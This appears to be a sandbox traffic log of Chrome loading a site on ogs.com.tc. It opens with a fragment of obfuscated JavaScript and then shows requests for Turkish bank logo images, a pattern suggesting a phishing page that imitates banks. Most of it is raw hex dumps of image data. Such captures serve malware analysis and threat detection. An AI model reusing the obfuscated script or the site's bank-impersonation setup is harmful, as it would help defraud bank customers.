    2024-05-25 22:18:13 UTC16384INData Raw: 2c 27 69 72 64 69 6e 27 2c 27 51 6d 68 72 68 27 2c 27 73 74 79 6c 65 27 2c 27 57 44 71 66 51 27 2c 27 53 4f 76 5a 41 27 2c 27 6d 74 42 58 6f 27 2c 27 50 55 77 66 44 27 2c 27 61 53 79 48 6c 27 2c 27 6f 53 57 64 54 27 2c 27 64 69 6e 69 7a 27 2c 27 50 66 73 70 56 27 2c 27 7a 49 59 41 6a 27 2c 27 50 4f 53 54 27 2c 27 76 61 5a 62 65 27 2c 27 58 78 79 58 51 27 2c 27 71 75 65 72 79 27 2c 27 67 4a 45 66 75 27 2c 27 63 51 59 56 4b 27 2c 27 6e 5c 78 32 30 66 6f 72 27 2c 27 62 56 63 67 46 27 2c 27 63 4d 6f 6b 67 27 2c 27 6f 5a 6a 56 45 27 2c 27 4f 67 4a 6f 78 27 2c 27 63 6f 6e 73 74 27 2c 27 62 67 6d 41 6d 27 2c 27 4c 75 62 76 58 27 2c 27 53 43 77 70 78 27 2c 27 58 44 41 74 53 27 2c 27 61 6e c4 b1 7a c4 b1 27 2c 27 4d 6b 4f 59 4b 27 2c 27 70 67 71 4a 7a 27 2c 27 6c
    Data Ascii: ,'irdin','Qmhrh','style','WDqfQ','SOvZA','mtBXo','PUwfD','aSyHl','oSWdT','diniz','PfspV','zIYAj','POST','vaZbe','XxyXQ','query','gJEfu','cQYVK','n\x20for','bVcgF','cMokg','oZjVE','OgJox','const','bgmAm','LubvX','SCwpx','XDAtS','anz','MkOYK','pgqJz','l
    2024-05-25 22:18:13 UTC16384INData Raw: 30 78 36 35 36 2c 30 78 37 32 30 2c 30 78 35 62 37 2c 30 78 36 64 63 29 5d 29 29 7b 69 66 28 5f 30 78 31 38 61 62 65 65 29 7b 76 61 72 20 5f 30 78 36 31 36 37 36 62 3d 5f 30 78 35 64 31 64 36 35 5b 5f 30 78 34 65 63 30 37 38 28 30 78 33 64 38 2c 30 78 33 39 37 2c 30 78 36 30 38 2c 30 78 34 64 38 2c 30 78 36 31 31 29 5d 28 5f 30 78 34 39 31 65 37 32 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 30 37 61 66 35 3d 6e 75 6c 6c 2c 5f 30 78 36 31 36 37 36 62 3b 7d 7d 65 6c 73 65 7b 69 66 28 5f 30 78 32 63 66 38 35 37 5b 5f 30 78 35 62 62 66 36 64 28 30 78 33 30 31 2c 30 78 32 62 64 2c 30 78 33 65 33 2c 30 78 35 32 36 2c 30 78 33 34 66 29 5d 28 74 79 70 65 6f 66 20 5f 30 78 34 39 38 64 37 31 2c 5f 30 78 32 63 66 38 35 37 5b 5f 30 78 63 62
    Data Ascii: 0x656,0x720,0x5b7,0x6dc)])){if(_0x18abee){var _0x61676b=_0x5d1d65[_0x4ec078(0x3d8,0x397,0x608,0x4d8,0x611)](_0x491e72,arguments);return _0x407af5=null,_0x61676b;}}else{if(_0x2cf857[_0x5bbf6d(0x301,0x2bd,0x3e3,0x526,0x34f)](typeof _0x498d71,_0x2cf857[_0xcb


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    35192.168.2.549754185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:12 UTC593OUTGET /assets/images/banks/fiba.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:13 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:12 GMT
    Content-Type: image/jpeg
    Content-Length: 36954
    Last-Modified: Thu, 23 May 2024 21:37:13 GMT
    Connection: close
    ETag: "664fb709-905a"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:13 UTC16100INData Raw: ff d8 ff e1 09 7b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 38 20 30 33 3a 33 31 3a 31 35 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: {ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:28 03:31:15"
    2024-05-25 22:18:13 UTC16384INData Raw: 4a 20 11 53 6b 8a 84 dd 7a 88 11 b1 ae e7 43 a7 a0 f8 c0 a3 92 4e a4 ef a0 18 40 8a 4a b9 13 21 07 1d 98 26 b8 af 97 44 0a 49 b3 e4 77 a5 ef 25 f5 69 dc c5 53 60 8f 45 a3 26 4f 12 28 0b fa 87 48 a2 73 84 d0 f1 0e 78 62 9e e4 9f a8 a7 c3 9e 30 26 13 eb 79 2c de c4 98 b6 d4 16 f3 0e da a4 1a 6e 48 ba 5c 73 e5 b9 25 d5 23 de 1c 39 3b c8 88 ff 00 36 65 6c 95 5f 4b b7 fb 82 1e 3e 7e 55 23 e6 a4 ab bd 01 92 67 09 a9 8b c6 8a f8 07 22 8d b3 72 d1 cd ce 9a 3b ae ac 0a f3 bc ad 71 24 09 ee 10 05 17 67 e2 21 10 a9 21 ac 3c 95 0e 3b 44 e7 df 36 24 8a 96 eb 1d 07 2d 53 52 2f cb cb 78 4b e9 4b 19 26 5a e2 0b 7b 39 52 f0 e9 d7 1f 57 56 e8 21 d9 ce df 8a 3f 4b 9f c1 3d 51 5f 00 70 7f e2 8d ae 40 7e bb 3a 6e ab 4a 71 f5 39 25 43 89 30 64 ac 67 e2 8a 73 4b 76 ce 4a c3 d9
    Data Ascii: J SkzCN@J!&DIw%iS`E&O(Hsxb0&y,nH\s%#9;6el_K>~U#g"r;q$g!!<;D6$-SR/xKK&Z{9RWV!?K=Q_p@~:nJq9%C0dgsKvJ
    2024-05-25 22:18:13 UTC4470INData Raw: 11 ce 73 90 6d 5e 2a e1 27 2b 06 8a aa 8c 62 bd ca ee c9 d9 3c 4e 55 f7 aa fe fd 7d ea 87 d3 36 76 2c 5e 6f 18 96 c7 94 38 d2 b4 71 e1 40 e6 d8 71 04 88 5d 05 20 fb 86 2c 0e 5e 83 14 48 8d 7a ab 05 7e 26 20 0e ad 94 81 3a b9 eb 18 b1 64 00 c7 8b 20 67 01 a0 58 42 99 0c cf 8d 32 0c e8 c6 60 26 c0 9f 06 50 9e 23 80 ad 61 42 56 39 8f 6a 39 15 3a 62 d6 68 ad a3 b5 9e 1e c1 21 fe 36 3b 91 3d cd 78 a7 36 42 2b 7e f7 74 ea 4d c4 1a 7c 45 dd d5 8e 2a fa 86 ba c2 fa aa 6b 45 5a 86 2c 09 b3 0c c8 35 b6 30 c1 32 54 b8 d0 7c a4 47 aa 31 1a ae f6 2f 7e 95 17 6f 55 9a 11 3b f6 1e 3b 23 47 4c 46 23 be 64 97 24 36 72 d7 b7 7f 7f 8f bf 48 ba 5e 45 db 5d ab bb 78 9b 2f 47 62 21 2f 7f 7a 28 20 9a 1c 75 4f f5 7b 74 c2 19 3c f2 fb 15 49 21 ce 90 5f c2 a5 32 bc 8a bf e5 e8 7d
    Data Ascii: sm^*'+b<NU}6v,^o8q@q] ,^Hz~& :d gXB2`&P#aBV9j9:bh!6;=x6B+~tM|E*kEZ,502T|G1/~oU;;#GLF#d$6rH^E]x/Gb!/z( uO{t<I!_2}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    36192.168.2.549756185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:12 UTC595OUTGET /assets/images/banks/finans.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:13 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:13 GMT
    Content-Type: image/jpeg
    Content-Length: 6232
    Last-Modified: Thu, 23 May 2024 21:37:13 GMT
    Connection: close
    ETag: "664fb709-1858"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:13 UTC6232INData Raw: 52 49 46 46 50 18 00 00 57 45 42 50 56 50 38 20 44 18 00 00 50 69 00 9d 01 2a f4 01 c8 00 3e 49 24 8f 45 a2 a2 21 11 4c 04 c8 28 04 84 b2 b7 70 ba fd fa 6f e7 7b 4a ba df b4 f3 6d e4 9e cb fd 34 f7 ee 3c f2 90 e5 cf fa bf 76 ff 32 bf d3 7a b0 fb d4 f7 0e fd 49 f1 80 f7 8d e6 1b f6 df f6 cf dd bf fd ef ed 7f bc 1f ec be a0 9f ce bf df 75 a1 fa 08 79 6f 7e e9 fc 2f 7f 65 ff 9b fb 6b ed 39 ff ff 59 43 c8 5f d7 ff 17 7c 28 fe c5 f9 39 e8 2f 96 0f 23 7b 2f f9 35 d2 1f ab 3c cd fe 41 f5 eb ef 3f d7 bf 6a ff 33 3f 03 fd ca f8 8b c0 17 f1 5f e5 3f df 3f 2a 7f b9 7e e4 72 2a 00 4f ca 7f aa ff b7 f5 01 fa af 32 3e c7 7b 00 7f 2c fe 9d fe af ed d3 e7 5e fd 8a 01 ff 2a fe eb ff 47 fc 6f b0 df fb df ea 7f 33 bd a5 7d 3d ff 57 fc af c0 4f f2 af eb df f1 ff c0 fb 4b ff
    Data Ascii: RIFFPWEBPVP8 DPi*>I$E!L(po{Jm4<v2zIuyo~/ek9YC_|(9/#{/5<A?j3?_??*~r*O2>{,^*Go3}=WOK


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    37192.168.2.549757185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:12 UTC596OUTGET /assets/images/banks/garanti.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:13 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:13 GMT
    Content-Type: image/jpeg
    Content-Length: 5268
    Last-Modified: Thu, 23 May 2024 21:37:13 GMT
    Connection: close
    ETag: "664fb709-1494"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:13 UTC5268INData Raw: 52 49 46 46 8c 14 00 00 57 45 42 50 56 50 38 20 80 14 00 00 30 63 00 9d 01 2a f4 01 c8 00 3e 49 24 90 45 a2 a2 21 91 5a 9c 8c 28 04 84 b3 b7 70 bb 00 86 6f 7e cd b9 67 d8 ff 85 f3 bd b3 bf 7e de 9b b2 7c ae 3c 7b f3 af f9 ff d0 3d a7 fa 85 f3 04 fd 4e f3 9e fd 49 f7 bf e6 03 f6 63 f6 c7 dd 33 fb ef ec e7 b9 cf 40 0f e3 1f ef 7a c7 bd 01 bc b2 bf 75 3e 16 bf b4 ff ca fd 99 f6 97 ff ff 9c b9 fe 03 b5 3f ee 1e 27 fe 2f f4 6f dd 7f 25 bf 76 fd fa 32 c7 d8 f6 a8 3f 22 fb 19 f9 1f ec df b5 bf 95 5f 7b 3f 88 ff 37 e2 4f 00 5f c4 ff 9c 7f 7e fc b3 fc a3 e3 8e 00 1f 98 7f 4e ff 3b f6 e7 e9 3b aa 0f 56 9e e0 1f cd ff ab ff b4 f5 ef fe 27 83 b5 00 ff a5 ff 65 ff b5 fe 5b dd 97 fa ef fd 5f eb 3d 07 fd 31 ff 97 fc ff c0 6f f3 6f ed 5f f2 3f bf f6 8d fd bb ff ff ee db
    Data Ascii: RIFFWEBPVP8 0c*>I$E!Z(po~g~|<{=NIc3@zu>?'/o%v2?"_{?7O_~N;;V'e[_=1oo_?


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    38192.168.2.549758185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:12 UTC593OUTGET /assets/images/banks/halk.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:13 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:13 GMT
    Content-Type: image/jpeg
    Content-Length: 4904
    Last-Modified: Thu, 23 May 2024 21:37:14 GMT
    Connection: close
    ETag: "664fb70a-1328"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:13 UTC4904INData Raw: 52 49 46 46 20 13 00 00 57 45 42 50 56 50 38 20 14 13 00 00 90 61 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 f7 59 08 50 09 09 65 6e e1 75 4b e1 cf b2 7e 2e f7 c8 52 4e df fd af f6 7b fb 4f bc 5d 7f fb 9f e2 af ea 9e e7 ff ba 76 91 cb df da fe d7 3d e9 3c 4b f3 7f f2 df d3 7f bd 7e e3 fc f7 fe df fe 77 d8 af e8 0f 60 3f ea 7f cf 3a 47 f9 80 fd bf f5 36 fe e7 fa 53 ee 03 f6 0b f6 97 fc 07 c8 07 f1 ef f0 1f f8 3d a4 bf cc fb 10 7f 8b ff 59 ff ff dc 37 f9 37 f8 6f ff fe b9 7f b7 5f ff fe 50 ff b2 7f c5 fd 9e f6 a8 ff ff ec 01 ff ff d4 03 ff ff 10 f7 f3 9f c6 ef 0a 3f c2 fe 54 f6 10 f9 e7 d7 ee 4e cf 33 f5 7f f0 5f d6 3f 65 bf 2c be fd ff 21 df ff 00 bf 63 ff 83 fc b3 e1 1d 00 7f 9b 7f 3f ff 63 f9 87 e7 7d fd 7f e3 5f ba 5f 58 ff d6 fe 45 7d 00 7f
    Data Ascii: RIFF WEBPVP8 a*>I$F"!!YPenuK~.RN{O]v=<K~w`?:G6S=Y77o_P?TN3_?e,!c?c}__XE}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    39192.168.2.549759185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:12 UTC593OUTGET /assets/images/banks/hsbc.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:13 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:13 GMT
    Content-Type: image/jpeg
    Content-Length: 33055
    Last-Modified: Thu, 23 May 2024 21:37:15 GMT
    Connection: close
    ETag: "664fb70b-811f"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:13 UTC16100INData Raw: ff d8 ff e1 0b 10 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 38 20 30 31 3a 35 36 3a 30 32 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:28 01:56:02"
    2024-05-25 22:18:13 UTC16384INData Raw: 82 bd f1 2a e5 65 99 fb 3f b7 25 24 8e 17 68 7c 43 ac 61 6a 54 df c5 cd 9a 57 18 f2 b8 90 2c ed 79 60 64 9b cf 1c 9a 2e 99 cb 1e ea 07 33 23 08 c4 7a b0 07 01 24 ce 61 bd a1 e0 ed 9d 09 f1 94 44 ec 1d 5a 07 96 88 98 38 60 07 19 74 7a f3 96 d9 69 0b 60 80 e7 c7 c6 8a 99 a7 04 3d cc 19 1b 23 24 17 28 1c 36 1c cb 74 97 de 7c 92 94 a5 43 5c 14 38 ab 8a d4 ee 3d 13 9e 09 20 83 b6 3f 29 ea 34 77 40 7b 09 8c 15 cb 25 17 69 7c 4d 2a 0a 0b 13 63 88 74 76 37 45 a5 0e 47 5c 6a 70 bf 6c e4 8a e5 56 f6 29 b2 55 8c d0 dd 18 94 1c c6 84 76 5c f0 fa 76 ec c7 5c 88 38 bf f8 f9 87 bc 52 6d 01 87 6a 6d 76 bf 01 d1 22 d1 2f be 5e 5e 5e 5e 58 7c 71 78 c5 24 6a c0 a1 6c a1 60 57 bb aa 3f b2 fa 35 42 af 0d 55 99 b5 a6 40 9c 7f 80 a2 27 60 ea d0 3c b3 c4 c1 c3 00 38 c7 47 af 29
    Data Ascii: *e?%$h|CajTW,y`d.3#z$aDZ8`tzi`=#$(6t|C\8= ?)4w@{%i|M*ctv7EG\jplV)Uv\v\8Rmjmv"/^^^^X|qx$jl`W?5BU@'`<8G)
    2024-05-25 22:18:13 UTC571INData Raw: b7 ab 98 d4 42 80 e2 55 6b c6 41 bd ad 20 4c 37 30 d1 cc c6 14 4f 61 18 d7 22 ee b0 a3 b6 d9 f6 b3 b6 ba 70 71 bb 03 31 d2 ed 30 36 b2 dc 43 87 8f b7 e6 08 da c6 4e 10 d8 e4 ad b2 56 b0 36 80 1a ff 00 42 43 0a 24 26 1b 0c 5a 8d a7 74 db 5a 82 17 1b 8d 33 db 2e b3 05 59 2d a4 08 79 07 90 00 12 34 82 80 22 35 cb 5b 5c ae 61 ed 4e c5 fe 84 76 14 ad d4 72 5f 25 ea 2d f6 9b cd a5 bc ab dd 46 a2 f6 53 a5 da 5b da 4b 72 29 0e 72 2a 35 82 10 d8 d6 8c 21 1b 58 08 e0 63 04 26 30 6c 6b 53 f0 55 bc 11 ce d6 56 ba 4e d5 34 b6 aa 91 65 2a 49 b3 b8 e0 eb 9b 49 2a f9 3a 3c e4 66 21 a5 4d c4 4e 94 65 2d bd 40 91 cf 1b dc f9 b0 98 b2 3e 22 3c ee c2 72 fc 03 5c fe 5a ba e5 be 32 d6 af 1c 83 12 68 d7 51 b5 91 6e f4 34 53 eb ad 2a ec 63 19 d5 ce a4 7d 6b be 2c 93 9e 56 43 04
    Data Ascii: BUkA L70Oa"pq106CNV6BC$&ZtZ3.Y-y4"5[\aNvr_%-FS[Kr)r*5!Xc&0lkSUVN4e*II*:<f!MNe-@>"<r\Z2hQn4S*c}k,VC


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    40192.168.2.549760185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:13 UTC361OUTGET /assets/images/banks/ykb.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:13 UTC282INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:13 GMT
    Content-Type: image/jpeg
    Content-Length: 4042
    Last-Modified: Thu, 23 May 2024 21:37:20 GMT
    Connection: close
    ETag: "664fb710-fca"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:13 UTC4042INData Raw: 52 49 46 46 c2 0f 00 00 57 45 42 50 56 50 38 20 b6 0f 00 00 b0 58 00 9d 01 2a f4 01 c8 00 3e 49 24 91 45 a2 a2 21 92 1a 14 48 28 04 84 b3 b7 70 bb 58 8d 80 03 b1 ea 72 f9 7f 37 7b 6f f7 fd bd ca 73 ca f7 8b 7f d5 7f 51 fc 99 f9 e5 fd c7 fc 97 b3 6f 30 0f d7 5e 90 9e 60 3f 5f 7f 65 fd d5 7f bb 7e be fb 8e fd 8f fd 77 f8 00 fe 75 fd f3 d6 0b d4 e3 fb bf fc ef 60 7f e5 bf ed 3d 36 7f 74 be 17 ff af ff c8 fd bc f6 b8 cd 3d fe eb da af f9 1f c9 4e c8 3f 74 7b 53 cb f5 e9 7e d2 7e 77 fb b7 ed ef c6 df e4 3b d1 e0 11 eb 8f f3 9f 93 5f 96 5c 73 20 03 eb 47 fa 7f 10 0d 54 32 00 fe 69 fd 27 fe 27 1f 6d 01 3f 96 ff 72 ff c9 fe 2f d9 5f ea 9f 43 7f 51 ff ec ff 33 f0 2d fa e7 ff 4f fb cf 6a cf 45 01 4b e7 7e 7d c1 7b 82 f7 05 ee 0b dc 17 b8 2f 70 5e e0 bd c1 7b 82 f7
    Data Ascii: RIFFWEBPVP8 X*>I$E!H(pXr7{osQo0^`?_e~wu`=6t=N?t{S~~w;_\s GT2i''m?r/_CQ3-OjEK~}{/p^{


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    41192.168.2.549763185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:13 UTC364OUTGET /assets/images/banks/ziraat.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:13 UTC282INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:13 GMT
    Content-Type: image/jpeg
    Content-Length: 3510
    Last-Modified: Thu, 23 May 2024 21:37:21 GMT
    Connection: close
    ETag: "664fb711-db6"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:13 UTC3510INData Raw: 52 49 46 46 ae 0d 00 00 57 45 42 50 56 50 38 20 a2 0d 00 00 b0 52 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 35 b8 d8 50 09 09 67 6e e1 76 b1 1f c8 1a 4b e6 4f 7d 1f 08 77 67 6e 3a 74 f2 7c e2 6f ed 5f 95 5f e7 3b 48 f9 80 7e 92 7f 83 fc aa ed 01 e6 03 f6 1f f5 df da 1b fd 1f f6 ef 70 1f a7 9f e7 7d c0 3f 52 7a c2 fd 03 3f 5b 7d 34 7f 61 fe 0d ff 64 ff 6b be 01 bf 58 7e ff f6 50 bc bf fd e3 b5 5f ec 3f 92 fe 7f f8 9c f0 cf b0 9f 8b ff 11 d9 93 eb 7f e4 4f 53 bf 91 fd 7a fb d7 e5 d7 e5 47 c9 5f e4 7c 1b f8 e1 fc f7 a8 47 e3 1f c7 ff b5 fe 5a fe 58 71 dd 69 1e 60 5e bd 7c f7 fd 27 f7 bf 1c ad 4d 7b ed ec 01 fc bb fa 4f fa de 41 ef 2a f6 02 fe 89 fe 03 f5 e3 dd 8b fb 3f fd 7e 60 3e 94 ff dd fe 97 e0 2f f9 c7 f6 8f f9 5e b9 de c9 bd 20 3f 70 03 2d
    Data Ascii: RIFFWEBPVP8 R*>I$F"!!5PgnvKO}wgn:t|o__;H~p}?Rz?[}4adkX~P_?OSzG_|GZXqi`^|'M{OA*?~`>/^ ?p-


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    42192.168.2.549762185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:13 UTC361OUTGET /assets/images/banks/ptt.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:13 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:13 GMT
    Content-Type: image/jpeg
    Content-Length: 5260
    Last-Modified: Thu, 23 May 2024 21:37:18 GMT
    Connection: close
    ETag: "664fb70e-148c"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
